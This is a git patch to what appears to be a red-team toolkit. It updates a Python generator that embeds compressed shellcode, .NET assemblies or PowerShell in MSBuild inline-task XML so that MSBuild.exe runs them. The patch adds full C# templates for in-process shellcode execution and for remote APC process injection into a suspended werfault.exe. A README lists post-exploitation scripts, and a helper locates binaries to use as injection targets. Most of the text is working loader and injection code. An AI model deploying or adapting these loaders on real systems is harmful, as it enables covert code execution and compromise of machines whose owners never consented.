From 96317dd8f99e1fdfb346bc962dd59a197b6129a7 Mon Sep 17 00:00:00 2001
From: mgeeky <mb@binary-offensive.com>
Date: Wed, 13 Jan 2021 05:16:09 -0800
Subject: [PATCH] added two useful windows scripts and updated
 generateMSBuildXML.py

---
 red-teaming/generateMSBuildXML.py            | 405 ++++++++++++++++---
 windows/Find-CLSIDForProgID.ps1              |   3 +
 windows/PE-library                           |   2 +-
 windows/README.md                            |   4 +
 windows/find-system-and-syswow64-binaries.py |  36 ++
 5 files changed, 402 insertions(+), 48 deletions(-)
 create mode 100644 windows/Find-CLSIDForProgID.ps1
 create mode 100644 windows/find-system-and-syswow64-binaries.py

diff --git a/red-teaming/generateMSBuildXML.py b/red-teaming/generateMSBuildXML.py
index f4c298e..e694429 100644
--- a/red-teaming/generateMSBuildXML.py
+++ b/red-teaming/generateMSBuildXML.py
@@ -28,7 +28,7 @@ import binascii
 import argparse
 
 
-def getCompressedPayload(filePath):
+def getCompressedPayload(filePath, returnRaw = False):
     out = io.BytesIO()
     encoded = ''
     with open(filePath, 'rb') as f:
@@ -38,57 +38,99 @@ def getCompressedPayload(filePath):
             fo.write(inp)
 
         encoded = base64.b64encode(out.getvalue())
+        if returnRaw:
+            return encoded
 
     powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
         encoded.decode()
     )
     return powershell
 
-def getInlineTask(payload, _format):
+def getPayloadCode(payload):
+    return f'shellcode = "{payload}";'
 
+    payloadCode = '\n'
+
+    N = 50000
+    codeSlices = map(lambda i: payload[i:i+N], range(0, len(payload), N))
+
+    variables = []
+
+    num = 1
+    for code in codeSlices:
+        payloadCode += f'string shellcode{num} = "{code}";\n'
+        variables.append(f'shellcode{num}')
+        num += 1
+
+    concat = 'shellcode = ' + ' + '.join(variables) + ';\n'
+    payloadCode += concat
+
+    return payloadCode
+
+def getInlineTask(module, payload, _format, apc, targetProcess):
     templateName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15)))
+    if len(module) > 0:
+        templateName = module
+
     taskName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15)))
 
+    payloadCode = getPayloadCode(payload.decode())
+    sys.stderr.write(payloadCode + '\n')
     launchCode = ''
 
     if _format == 'exe':
 
-        exeLaunchCode = string.Template('''<ParameterGroup/>
-    <Task>
-      <Using Namespace="System" />
-      <Using Namespace="System.Reflection" />
-      
-      <Code Type="Fragment" Language="cs">
-        <![CDATA[
-                    string payload = "$payload2";
-                    byte[] decoded = System.Convert.FromBase64String(payload);
+        exeLaunchCode = string.Template('''<Task>
+      <Reference Include="System.Management.Automation" />
+      <Code Type="Class" Language="cs">
+        <![CDATA[       
+            using System.IO;
+            using System.IO.Compression;
+            using System;
+            using System.Reflection;
+            using System.Text;
 
-                    Assembly asm = Assembly.Load(decoded);
+            public class $templateName : Task {
+
+                public static byte[] DecompressString(string compressedText) {
+                    byte[] data = Convert.FromBase64String(compressedText);
+
+                    using (var ms = new MemoryStream(data)) {
+                        using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
+                            using (var decompressed = new MemoryStream()) {
+                                gzip.CopyTo(decompressed);
+                                return decompressed.ToArray();
+                            }
+                        }
+                    }
+                }
+
+                public override bool Execute() {
+
+                    string shellcode = "";
+                    $payloadCode
+                    byte[] payload = DecompressString(shellcode);
+
+                    Assembly asm = Assembly.Load(payload);
                     MethodInfo method = asm.EntryPoint;
                     object instance = asm.CreateInstance(method.Name);
                     method.Invoke(instance, null); 
+                    return true;
+                }                                
+            }           
         ]]>
-      </Code>''').safe_substitute(
-            payload2 = base64.b64encode(payload.encode()).decode()
+      </Code>
+    </Task>''').safe_substitute(
+            payloadCode = payloadCode
         )
 
-
         launchCode = exeLaunchCode
 
     elif _format == 'raw':
+        shellcodeLoader = ''
 
-        foo = str(binascii.hexlify(payload), 'ascii')
-        fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)]
-        encodedPayload = '                        '
-
-        for i in range(len(fooarr)):
-            if i % 32 == 0 and i > 0:
-                encodedPayload += '\n                        '
-            encodedPayload += '{}, '.format(fooarr[i])
-
-        encodedPayload = encodedPayload.strip()[:-1]
-
-        shellcodeLoader = string.Template('''<Task>
+        if not apc:
+            shellcodeLoader = string.Template('''<Task>
     <Reference Include="System.Management.Automation" />
       <Code Type="Class" Language="cs">
         <![CDATA[       
@@ -100,7 +142,9 @@ def getInlineTask(payload, _format):
             using System.Diagnostics;
             using System.Reflection;
             using System.Runtime.InteropServices;
-
+            using System.IO;
+            using System.IO.Compression;
+           using System.Text;
 
             public class $templateName : Task {
 
@@ -123,11 +167,24 @@ def getInlineTask(payload, _format):
                 private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
                 private static UInt32 MEM_RELEASE = 0x8000;
 
+                public static byte[] DecompressString(string compressedText) {
+                    byte[] data = Convert.FromBase64String(compressedText);
+
+                    using (var ms = new MemoryStream(data)) {
+                        using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
+                            using (var decompressed = new MemoryStream()) {
+                                gzip.CopyTo(decompressed);
+                                return decompressed.ToArray();
+                            }
+                        }
+                    }
+                }
+
                 public override bool Execute() {
 
-                    byte[] payload = new byte[$payloadSize] {
-                        $payload2
-                    };
+                    string shellcode = "";
+                    $payloadCode
+                    byte[] payload = DecompressString(shellcode);
 
                     IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
                     Marshal.Copy(payload, 0, funcAddr, payload.Length);
@@ -144,10 +201,214 @@ def getInlineTask(payload, _format):
                 }                                
             }           
         ]]>
-      </Code>''').safe_substitute(
+      </Code>
+    </Task>''').safe_substitute(
+                templateName = templateName,
+                payloadCode = payloadCode
+            )
+        else:
+            #
+            # The below MSBuild template comes from:
+            #   https://github.com/infosecn1nja/MaliciousMacroMSBuild
+            #
+            shellcodeLoader = string.Template('''<Task>
+  <Code Type="Class" Language="cs">
+  <![CDATA[
+    using System;
+    using System.Reflection;
+    using Microsoft.CSharp;
+    using Microsoft.Build.Framework;
+    using Microsoft.Build.Utilities;
+    using System.Diagnostics;
+    using System.Runtime.InteropServices;
+    using System.IO;
+    using System.IO.Compression;
+    using System.Text;
+
+    public class $templateName : Task, ITask
+    {
+        public static byte[] DecompressString(string compressedText) {
+            byte[] data = Convert.FromBase64String(compressedText);
+
+            using (var ms = new MemoryStream(data)) {
+                using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
+                    using (var decompressed = new MemoryStream()) {
+                        gzip.CopyTo(decompressed);
+                        return decompressed.ToArray();
+                    }
+                }
+            }
+        }
+
+        public override bool Execute() {
+
+            string shellcode = "";
+            $payloadCode
+            byte[] payload = DecompressString(shellcode);
+              
+            string processpath = Environment.ExpandEnvironmentVariables(@"$targetProcess");
+            STARTUPINFO si = new STARTUPINFO();
+            PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
+            bool success = CreateProcess(null, processpath, 
+            IntPtr.Zero, IntPtr.Zero, false, 
+            ProcessCreationFlags.CREATE_SUSPENDED, 
+            IntPtr.Zero, null, ref si, out pi);
+
+            IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, payload.Length,MEM_COMMIT, PAGE_READWRITE);
+            IntPtr bytesWritten = IntPtr.Zero;
+            bool resultBool = WriteProcessMemory(pi.hProcess,resultPtr,payload,payload.Length, out bytesWritten);
+
+            IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
+            uint oldProtect = 0;
+            resultBool = VirtualProtectEx(pi.hProcess,resultPtr, payload.Length,PAGE_EXECUTE_READ, out oldProtect);
+            IntPtr ptr = QueueUserAPC(resultPtr,sht,IntPtr.Zero);
+
+            IntPtr ThreadHandle = pi.hThread;
+            ResumeThread(ThreadHandle);
+            return true;
+        }
+        
+        private static UInt32 MEM_COMMIT = 0x1000;
+       
+        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
+        private static UInt32 PAGE_READWRITE = 0x04;
+        private static UInt32 PAGE_EXECUTE_READ = 0x20;
+        
+        [Flags]
+        public enum ProcessAccessFlags : uint
+        {
+          All = 0x001F0FFF,
+          Terminate = 0x00000001,
+          CreateThread = 0x00000002,
+          VirtualMemoryOperation = 0x00000008,
+          VirtualMemoryRead = 0x00000010,
+          VirtualMemoryWrite = 0x00000020,
+          DuplicateHandle = 0x00000040,
+          CreateProcess = 0x000000080,
+          SetQuota = 0x00000100,
+          SetInformation = 0x00000200,
+          QueryInformation = 0x00000400,
+          QueryLimitedInformation = 0x00001000,
+          Synchronize = 0x00100000
+        }
+        
+        [Flags]
+        public enum ProcessCreationFlags : uint
+        {
+          ZERO_FLAG = 0x00000000,
+          CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
+          CREATE_DEFAULT_ERROR_MODE = 0x04000000,
+          CREATE_NEW_CONSOLE = 0x00000010,
+          CREATE_NEW_PROCESS_GROUP = 0x00000200,
+          CREATE_NO_WINDOW = 0x08000000,
+          CREATE_PROTECTED_PROCESS = 0x00040000,
+          CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
+          CREATE_SEPARATE_WOW_VDM = 0x00001000,
+          CREATE_SHARED_WOW_VDM = 0x00001000,
+          CREATE_SUSPENDED = 0x00000004,
+          CREATE_UNICODE_ENVIRONMENT = 0x00000400,
+          DEBUG_ONLY_THIS_PROCESS = 0x00000002,
+          DEBUG_PROCESS = 0x00000001,
+          DETACHED_PROCESS = 0x00000008,
+          EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
+          INHERIT_PARENT_AFFINITY = 0x00010000
+        }
+
+        public struct PROCESS_INFORMATION
+        {
+          public IntPtr hProcess;
+          public IntPtr hThread;
+          public uint dwProcessId;
+          public uint dwThreadId;
+        }
+
+        public struct STARTUPINFO
+        {
+          public uint cb;
+          public string lpReserved;
+          public string lpDesktop;
+          public string lpTitle;
+          public uint dwX;
+          public uint dwY;
+          public uint dwXSize;
+          public uint dwYSize;
+          public uint dwXCountChars;
+          public uint dwYCountChars;
+          public uint dwFillAttribute;
+          public uint dwFlags;
+          public short wShowWindow;
+          public short cbReserved2;
+          public IntPtr lpReserved2;
+          public IntPtr hStdInput;
+          public IntPtr hStdOutput;
+          public IntPtr hStdError;
+        }
+        
+        [Flags]
+        public enum    ThreadAccess : int
+        {
+          TERMINATE           = (0x0001)  ,
+          SUSPEND_RESUME      = (0x0002)  ,
+          GET_CONTEXT         = (0x0008)  ,
+          SET_CONTEXT         = (0x0010)  ,
+          SET_INFORMATION     = (0x0020)  ,
+          QUERY_INFORMATION       = (0x0040)  ,
+          SET_THREAD_TOKEN    = (0x0080)  ,
+          IMPERSONATE         = (0x0100)  ,
+          DIRECT_IMPERSONATION    = (0x0200)
+        }
+        
+        [DllImport("kernel32.dll", SetLastError = true)]
+        public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
+          int dwThreadId);
+        
+        [DllImport("kernel32.dll",SetLastError = true)]
+        public static extern bool WriteProcessMemory(
+          IntPtr hProcess,
+          IntPtr lpBaseAddress,
+          byte[] lpBuffer,
+          int nSize,
+          out IntPtr lpNumberOfBytesWritten);
+        
+        [DllImport("kernel32.dll")]
+        public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
+        
+        [DllImport("kernel32")]
+        public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
+           Int32 size, UInt32 flAllocationType, UInt32 flProtect);
+
+        [DllImport("kernel32.dll", SetLastError = true )]
+        public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
+        Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
+        
+        [DllImport("kernel32.dll", SetLastError = true)]
+        public static extern IntPtr OpenProcess(
+         ProcessAccessFlags processAccess,
+         bool bInheritHandle,
+         int processId
+        );
+        
+         [DllImport("kernel32.dll")]
+        public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes,
+                     bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment,
+                    string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
+
+        [DllImport("kernel32.dll")]
+        public static extern uint ResumeThread(IntPtr hThread);
+
+        [DllImport("kernel32.dll")]
+        public static extern uint SuspendThread(IntPtr hThread);
+        
+        [DllImport("kernel32.dll")]
+        public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
+        int dwSize, uint flNewProtect, out uint lpflOldProtect);
+      }
+        ]]>
+      </Code>
+    </Task>''').safe_substitute(
         templateName = templateName,
-        payload2 = encodedPayload,
-        payloadSize = len(payload)
+        payloadCode = payloadCode,
+        targetProcess = targetProcess
     )
 
         launchCode = shellcodeLoader
@@ -157,15 +418,33 @@ def getInlineTask(payload, _format):
     <Reference Include="System.Management.Automation" />
       <Code Type="Class" Language="cs">
         <![CDATA[       
+            using System.IO;
+            using System.IO.Compression;
             using System.Management.Automation;
             using System.Management.Automation.Runspaces;
             using Microsoft.Build.Framework;
             using Microsoft.Build.Utilities;
+            using System.Text;
 
             public class $templateName : Task {
+                public static byte[] DecompressString(string compressedText) {
+                    byte[] data = Convert.FromBase64String(compressedText);
+
+                    using (var ms = new MemoryStream(data)) {
+                        using (var gzip = new GZipStream(ms, CompressionMode.Decompress)) {
+                            using (var decompressed = new MemoryStream()) {
+                                gzip.CopyTo(decompressed);
+                                return decompressed.ToArray();
+                            }
+                        }
+                    }
+                }
+
                 public override bool Execute() {
 
-                    byte[] payload = System.Convert.FromBase64String("$payload2");
+                    string shellcode = "";
+                    $payloadCode
+                    byte[] payload = DecompressString(shellcode);
                     string decoded = System.Text.Encoding.UTF8.GetString(payload);
 
                     Runspace runspace = RunspaceFactory.CreateRunspace();
@@ -180,9 +459,10 @@ def getInlineTask(payload, _format):
                 }                                
             }           
         ]]>
-      </Code>''').safe_substitute(
+      </Code>
+    </Task>''').safe_substitute(
             templateName = templateName,
-            payload2 = base64.b64encode(payload.encode()).decode()
+            payloadCode = payloadCode
         )
 
         launchCode = powershellLaunchCode
@@ -200,7 +480,6 @@ def getInlineTask(payload, _format):
   <UsingTask TaskName="$templateName" TaskFactory="CodeTaskFactory"
     AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
     $launchCode
-    </Task>
   </UsingTask>
 </Project>''').safe_substitute(
         taskName = taskName,
@@ -265,20 +544,38 @@ def minimize(output):
         'lpThreadId' : 'p11',
         'dwMilliseconds' : 'p12',
         'hHandle' : 'p13',
+        'processpath' : 'p14',
+        'shellcode' : 'p15',
+        'resultPtr' : 'p16',
+        'bytesWritten' : 'p17',
+        'resultBool' : 'p18',
+        'ThreadHandle' : 'p19',
+        'PAGE_READWRITE' : 'p20',
+        'PAGE_EXECUTE_READ' : 'p21',
     }
 
-    for k, v in variables.items():
-        output = output.replace(k, v)
+    # Variables renaming tends to corrupt Base64 streams.
+    #for k, v in variables.items():
+    #    output = output.replace(k, v)
 
     return output
 
 def opts(argv):
     parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
     parser.add_argument('inputFile', help = 'Input file to be encoded within XML. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
+
+    parser.add_argument('-o', '--output', metavar='PATH', default='', type=str, help = 'Output path where to write generated script. Default: stdout')
+    parser.add_argument('-n', '--module', metavar='NAME', default='', type=str, help = 'Specifies custom C# module name for the generated Task (for needs of shellcode loaders such as DotNetToJScript or Donut). Default: auto generated name.')
     parser.add_argument('-m', '--minimize', action='store_true', help = 'Minimize the output XML file.')
     parser.add_argument('-b', '--encode', action='store_true', help = 'Base64 encode output XML file.')
-    parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
-    parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.')
+    parser.add_argument('-e', '--exe', action='store_true', 
+        help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
+    parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread (VirtualAlloc + CreateThread)')
+    parser.add_argument('--queue-apc', action='store_true', 
+        help = 'If --raw was specified, generate C# code template with CreateProcess + WriteProcessMemory + QueueUserAPC process injection technique instead of default CreateThread.')
+    parser.add_argument('--target-process', metavar='PATH', default=r'%windir%\system32\werfault.exe', 
+        help = r'This option specifies target process path for remote process injection in --queue-apc technique. May use environment variables. May also contain command line for spawned process, example: --target-process "%%windir%%\system32\werfault.exe -l -u 1234"')
+    parser.add_argument('--only-csharp', action='store_true', help = 'Return generated C# code instead of MSBuild\'s XML.')
 
     args = parser.parse_args()
 
@@ -286,6 +583,8 @@ def opts(argv):
         sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n')
         sys.exit(-1)
 
+    args.target_process = args.target_process.replace("^%", '%')
+
     return args
 
 def main(argv):
@@ -296,7 +595,7 @@ def main(argv):
 
 ''')
     if len(argv) < 2:
-        print('Usage: ./generateMSBuildXML.py <inputFile>')
+        print('Usage: ./generateMSBuildXML.py [options] <inputFile>')
         sys.exit(-1)
 
     args = opts(argv)
@@ -325,17 +624,29 @@ def main(argv):
         if args.inputFile.endswith('.exe'):
             return False
             
-        payload = getCompressedPayload(args.inputFile)
+    payload = getCompressedPayload(args.inputFile, _format != 'powershell')
+    output = getInlineTask(args.module, payload, _format, args.queue_apc, args.target_process)
 
-    output = getInlineTask(payload, _format)
+    if args.only_csharp:
+        m = re.search(r'\<\!\[CDATA\[(.+)\]\]\>', output, re.M|re.S)
+        if m:
+            output = m.groups(0)[0]
 
     if args.minimize:
         output = minimize(output)
 
     if args.encode:
-        print(base64.b64encode(output))
+        if len(args.output) > 0:
+            with open(args.output, 'w') as f:
+                f.write(base64.b64encode(output))
+        else:
+            print(base64.b64encode(output))
     else:
-        print(output)
+        if len(args.output) > 0:
+            with open(args.output, 'w') as f:
+                f.write(output)
+        else:
+            print(output)
 
     msbuildPath = r'%WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
     if 'PROGRAMFILES(X86)' in os.environ:
diff --git a/windows/Find-CLSIDForProgID.ps1 b/windows/Find-CLSIDForProgID.ps1
new file mode 100644
index 0000000..ac8841f
--- /dev/null
+++ b/windows/Find-CLSIDForProgID.ps1
@@ -0,0 +1,3 @@
+function Find-CLSIDForProgID($ProgId) {
+    Get-ChildItem REGISTRY::HKEY_CLASSES_ROOT\CLSID -Include PROGID -Recurse | where {$_.GetValue("") -match $ProgId }
+}
\ No newline at end of file
diff --git a/windows/PE-library b/windows/PE-library
index fcfe1e3..fb7aeee 160000
--- a/windows/PE-library
+++ b/windows/PE-library
@@ -1 +1 @@
-Subproject commit fcfe1e3a40f726e86a1f89e9627055a43b2604de
+Subproject commit fb7aeee8438b959099b01e38eadce917849ed488
diff --git a/windows/README.md b/windows/README.md
index 88b43b5..c4ebc2f 100644
--- a/windows/README.md
+++ b/windows/README.md
@@ -3,6 +3,10 @@
 
 - **`awareness.bat`** - Little and quick Windows Situational-Awareness set of commands to execute after gaining initial foothold (coming from APT34: https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html ) ([gist](https://gist.github.com/mgeeky/237b48e0bb6546acb53696228ab50794))
 
+- **`Find-CLSIDForProgID.ps1`** - Tries to locate COM object's `ProgID` based on a given CLSID.
+
+- **`find-system-and-syswow64-binaries.py`** - Finds files with specified extension in both System32 and SysWOW64 and then prints their intersection. Useful for finding executables (for process injection purposes) that reside in both directories (such as `WerFault.exe`)
+
 - **`Force-PSRemoting.ps1`** - Forcefully enable WinRM / PSRemoting. [gist](https://gist.github.com/mgeeky/313c22def5c86d7a529f41e5b6ff79b8)
 
 - **`GlobalProtectDisable.cpp`** - Global Protect VPN Application patcher allowing the Administrator user to disable VPN without Passcode. ([gist](https://gist.github.com/mgeeky/54ac676226a1a4bd9fd8653e24adc2e9))
diff --git a/windows/find-system-and-syswow64-binaries.py b/windows/find-system-and-syswow64-binaries.py
new file mode 100644
index 0000000..f0535b9
--- /dev/null
+++ b/windows/find-system-and-syswow64-binaries.py
@@ -0,0 +1,36 @@
+#!/usr/bin/python3
+
+import sys
+import os
+import glob
+
+def main(argv):
+    if len(argv) == 1:
+        print('Usage: ./script <ext>')
+        return False
+
+    ext = argv[1]
+    system32 = set()
+    syswow64 = set()
+    p1 = os.path.join(os.environ['Windir'], 'System32' + os.sep + '*.' + ext)
+    p2 = os.path.join(os.environ['Windir'], 'SysWOW64' + os.sep + '*.' + ext)
+
+    sys.stderr.write('[.] System32: ' + p1 + '\n')
+    sys.stderr.write('[.] SysWOW64: ' + p2 + '\n')
+
+    for file in glob.glob(p1):
+        system32.add(os.path.basename(file))
+
+    for file in glob.glob(p2):
+        syswow64.add(os.path.basename(file))
+
+    commons = system32.intersection(syswow64)
+    sys.stderr.write(f"[.] Found {len(system32)} files in System32\n")
+    sys.stderr.write(f"[.] Found {len(syswow64)} files in SysWOW64\n")
+    sys.stderr.write(f"[.] Intersection of these two sets: {len(commons)}\n")
+
+    for f in commons:
+        print(f)
+
+if __name__ == '__main__':
+    main(sys.argv)
\ No newline at end of file